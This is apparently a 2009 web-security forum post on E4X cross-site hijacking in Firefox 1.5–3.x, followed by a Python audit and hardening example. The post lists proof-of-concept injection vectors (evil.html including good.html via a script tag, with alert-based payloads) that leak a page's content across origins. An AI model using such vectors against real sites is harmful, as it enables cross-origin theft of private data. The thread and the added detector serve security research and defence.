Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
E4X discussion/code/vectors (rev 2)
Posted by: Anonymous User
Date: July 12, 2009 01:04PM

Hi all,

I was thinking it would make sense to start a separate E4X thread. I had some spare time this afternoon and spent some time googling and playing around. Knowing that at least Gareth, SDC and thornmaker have done research in this area, I think there's more to add to this topic.

//Information Disclosure
Quote

good.html

<html>
<head>
<title>E4X</title>
</head>
<body></body>
</html>

Quote

evil.html

<html>
<head></head>
<body>
<script src=good.html></script>
</body>
</html>


//Injection points in good.html
Quote

// a= -> alert(a) in evil.html
a=<html>
<head></head>
</html>


// "/>;a=<tag foo=" -> alert(a) in evil.html
<html foo=""/>;a=<html foo="">
<head></head>
</html>


// </tag>;a=<tag> -> alert(a) in evil.html
<html></html>;a=<html>
<head></head>
</html>


// <{alert( ... )}> -> multi-point injection
<html>
<body>
<{alert(<b>secret</b>)}/>
</body>
</html>


// <![[CDATA[ ... ]]> -> multi-line attribute injection
<html a="<![CDATA[foo
<head>
<title>E4X</title>
</head>]]>">
<body>secret</body>
</html>.body


// .toXMLString().match(/.*/m),alert(RegExp.input) -> automatically alerts
<html>
<body>text</body>
</html>.toXMLString().match(/.*/m),alert(RegExp.input)
-->


//Additional links

//Good to know
Quote

Only FF1.5 - 3.x support E4X right now
Quote

E4X doesn't like DOCTYPEs, ELEMENT, ATTLIST... for now
Quote

E4X doesn't like invalid markup
Quote

var o = <b><p>x</p></b>; o.watch("p", function () {alert(1)});o.p=1 // apparently watch() has no impact on E4X object properties
Quote

NoScript: Potential cross-site E4X hijacking detected and blocked // switch off NoScript for better testing



Edited 3 time(s). Last edit at 07/13/2009 04:19PM by .mario.
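The "Good to know" notes above give a defender two concrete properties to audit for: E4X rejects DOCTYPEs and rejects markup that is not well-formed XML, so a page that has neither property is the kind of cross-origin-readable document this thread describes. The following is an added example, not code from the post, that classifies a response body along those lines and applies the DOCTYPE fix; it uses Python's expat-based parser as a stand-in for the E4X parser (an approximation, since E4X and expat do not agree on every input), and the function and label names are mine.

```python
import re
import xml.etree.ElementTree as ET

# E4X (Firefox 1.5-3.x) refuses documents that start with a DOCTYPE.
DOCTYPE_RE = re.compile(r"^\s*<!DOCTYPE", re.IGNORECASE)

# Constructed sample: the well-formed, DOCTYPE-less page from the post.
GOOD_HTML = "<html>\n<head>\n<title>E4X</title>\n</head>\n<body></body>\n</html>\n"


def e4x_exposure(body: str) -> str:
    """Classify an HTML body for cross-site E4X inclusion exposure.

    Returns one of:
      "protected-doctype"   - starts with a DOCTYPE, which E4X rejects
      "protected-malformed" - not well-formed XML, which E4X rejects
      "exposed"             - parses as a single well-formed XML document,
                              so it could be read as an E4X literal via
                              <script src=...> from another origin
    Well-formedness is judged with expat, an approximation of E4X's parser.
    """
    if DOCTYPE_RE.match(body):
        return "protected-doctype"
    try:
        ET.fromstring(body)
    except ET.ParseError:
        return "protected-malformed"
    return "exposed"


def harden(body: str) -> str:
    """Prefix a DOCTYPE so the document is no longer a valid E4X literal.

    Idempotent: a body that already carries a DOCTYPE is returned unchanged.
    """
    if DOCTYPE_RE.match(body):
        return body
    return "<!DOCTYPE html>\n" + body


def audit(pages: dict) -> dict:
    """Map page name -> exposure label for a batch of response bodies."""
    return {name: e4x_exposure(body) for name, body in pages.items()}
```

Typical real-world HTML (unclosed `<br>`, `&nbsp;`) lands in `protected-malformed`; the pages worth a closer look are the clean XHTML-style ones that come back `exposed` without a DOCTYPE.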
